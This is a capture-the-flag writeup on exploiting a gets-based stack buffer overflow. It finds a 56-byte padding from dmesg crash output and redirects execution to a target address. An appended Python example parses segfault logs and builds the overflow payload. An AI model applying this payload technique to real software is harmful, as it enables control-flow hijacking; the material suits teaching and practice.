![2ee9fdb2ab93cc0791cbf178a78ae2aa.png](a09b188be2af45dba940087e99c92083.png)

Let's analyze the binary.

![4e3f4f2e13d64a99e7584e9b1e9b78c2.png](61275c2519314493928a8cfd8dfeb88d.png)

![e83827fc3f607bcfeea26470b9cc2154.png](268ffe5d56104b228a4a4ae9a1cf0828.png)

We can see that it's calling `gets`, and we can see where we want to end up. It looks like we want to overflow the buffer and set the instruction pointer to that address. Let's do it.

First, let's find out how many junk characters we need to send as padding. Using Python and `dmesg`, we can send inputs of different lengths and check exactly where the segfault is occurring.

![50a47b5c51540125ef93672f75906952.png](76f9abfc216c4069b75431bbd4e679ce.png)

![1fce1de1a11e5c70ef8dc6b9fc8ca3b6.png](0d2aff858bc8487d83458fcd99a4c497.png)

At 57 bytes, we start to see 41 (`A`) leaking in. Let's use 56 as our padding then.

Now we know both the address we want to jump to (0x004011d3) and the padding required (56). Let's write a script using Python and pwntools.

![e35c9fe3fb739f339629446a648b49af.png](025abd299b514adcaaccb67ab21e3a80.png)

![0b660c93498548dc0103907a2da6be2b.png](1a8780429e1e4efabec96c0aa75424ec.png)

---

Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]

Tags: #ctf #buffer_overflow #exploit_development #scripting

Related:
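The padding search described above, as an added example that is not part of the original writeup: it reads the `ip` field out of `dmesg` segfault lines from successive runs, counts how many low-order bytes of the faulting address were replaced by the `A` (0x41) fill, and derives the padding from the first run that shows any, then builds the same `padding + p64(address)` payload with `struct` instead of pwntools so it runs offline. The dmesg lines, the process name `vuln`, and the faulting addresses are constructed for illustration; only the 57/56 relationship and the target 0x4011d3 come from the writeup.

```python
import re
import struct

# Constructed dmesg output (not from the original post): one line per run,
# tagged with the number of 'A' bytes that was sent for that run.
CRASH_LOG = [
    (56, "[10.1] vuln[4242]: segfault at 0 ip 00000000004011a0 sp 00007ffc1234abc0 error 4 in vuln[401000+1000]"),
    (57, "[10.2] vuln[4243]: segfault at 41 ip 0000000000401141 sp 00007ffc1234abc0 error 4 in vuln[401000+1000]"),
    (58, "[10.3] vuln[4244]: segfault at 4141 ip 0000000000404141 sp 00007ffc1234abc0 error 4 in vuln[401000+1000]"),
]

# x86-64 kernel segfault line: "segfault at <addr> ip <ip> sp <sp> ..."
SEGFAULT_RE = re.compile(r"segfault at (?P<at>[0-9a-f]+) ip (?P<ip>[0-9a-f]+) sp (?P<sp>[0-9a-f]+)")


def parse_ip(line: str):
    """Return the faulting instruction pointer from a dmesg line, or None."""
    m = SEGFAULT_RE.search(line)
    return int(m.group("ip"), 16) if m else None


def overwritten_bytes(ip: int, fill: int = 0x41) -> int:
    """Count low-order bytes of ip equal to the fill byte (little-endian: the
    first byte of our input that reaches the saved return address lands in the
    least significant byte)."""
    n = 0
    while n < 8 and (ip >> (8 * n)) & 0xFF == fill:
        n += 1
    return n


def find_padding(runs, fill: int = 0x41):
    """Padding = bytes sent minus bytes that reached ip, from the first run that
    shows any fill bytes. Probing one byte at a time matters: once the whole
    address is overwritten it is non-canonical and the fault is reported at the
    `ret` itself, so ip no longer shows the fill pattern."""
    for length, line in runs:
        ip = parse_ip(line)
        if ip is None:
            continue
        n = overwritten_bytes(ip, fill)
        if n:
            return length - n
    return None


def build_payload(padding: int, target: int) -> bytes:
    """Equivalent of b'A' * padding + p64(target) in pwntools."""
    return b"A" * padding + struct.pack("<Q", target)
```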